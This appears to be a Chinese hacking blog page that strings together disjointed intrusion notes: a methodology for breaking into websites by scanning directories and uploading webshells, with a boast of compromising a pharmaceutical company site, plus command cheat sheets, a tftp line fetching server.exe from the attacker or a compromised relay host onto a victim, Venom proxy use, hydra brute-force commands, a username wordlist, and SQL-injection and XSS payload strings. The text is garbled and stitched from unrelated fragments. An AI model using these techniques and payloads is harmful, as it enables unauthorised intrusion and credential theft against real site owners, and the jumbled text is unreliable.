yyyyxzj的博客

test,test;无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多!7.一般的大站很少有用现成的CMS的，于是如果你有幸找到源码，那你就发了，注入漏洞啊，上传漏洞啊，写文件漏洞啊，都掌握在你手里。13.想搞一般的小站，记得查看这个小站的版权，找做这个站的公司，然后从这个公司做的其他站下手，得到源码再回头搞，我曾经通过这个方法拿下某知名制药的公司站。

上面的思路如果用好了我想拿下一个普通站应该是可以的，不过这只是通用的思路，主要还是要多看别人写的入侵经验，因为漏洞是怎么也说不完的，比如我以上写的思路很多常用的漏洞的尝试并没有写进去，比如xss，但是如果用xss那站一定是一个漫长的过程，记得一前看别人写的渗透清华大学，就是捡的分站日，而且是用一个列目录的漏洞，然后找到了一个数据库管理目录拿到一句话的，再次说一遍，思路不是死的。接下来很重要的一点就是，无论什么站，都不要放弃尝试，这很重要。找信息，找弱点，其它的就沿着第二种到第一种的思路吧。

telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）cd cd　..回到上一层目录，注意cd 与..之间有空格。cat >abc.txt 往abc.txt文件中写上内容。rm 文件名 删除文件，rm -a 目录名删除目录及子目录。more 文件名 以一页一页的方式显示一个文本文件。uname 显示版本信息（同win2K的 ver）chmod 设定档案或目录的存取权限。

参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送。dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间。复制本地c:\srv.exe到对方的admin下。

upload.jsswipe.jsindex.jsadmin.jsinfo.jsaddinfo.jsbanner.jsclass.jscommon.jsconfig.jsjcode.jsjson.jsjson1.jsjson2.jslogin.jslink.jslinkage.jsopen.jsopenapp.jsreview.jsscripts.jsscript.jsselect.js。

-icmp-orig-time 设置icmp原始时间戳--icmp-recv-time 设置icmp接受时间戳--icmp-trans-time 设置icmp发送的时间戳--arp-type arp类型(ARP-reply, RARP, RARP-reply)--arp-sender-mac 发送人的mac地址--arp-sender-ip 设置发件人ip地址--arp-target-mac 设置目标mac地址--arp-target-ip 设置目标ip地址-S 设置源ip地址。

venom是一款为渗透测试人员设计的go开发是代理工具。可以继续多个节点连接。可以使用venom将网络流量代理到内网。端口 建立sock5代理 端口99999。setdes/getdes 设置/获取节点。支持多种平台win，linux。获取节点的交互shell。goto id，进入agent节点。download、节点下载文件。使用help打印帮助信息。upload、向节点上传。show显示，网络拓扑。

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /web/index.asp。hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V。hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh2。-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探。

admintesttest01test1test2weblogicftpmanagermanageuserguestaccountsupersuperusermasterimapmemcachedmongodboraclepop3postgresqlrdpredissmbsmtpsqlserversshsvntelnettomcatvncxiaomihuaweiapple。

">XSSb={};{{{}.")));}}{{{}.")));{{{}.")));}}}}}}}}}}b={};{}.")));

"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"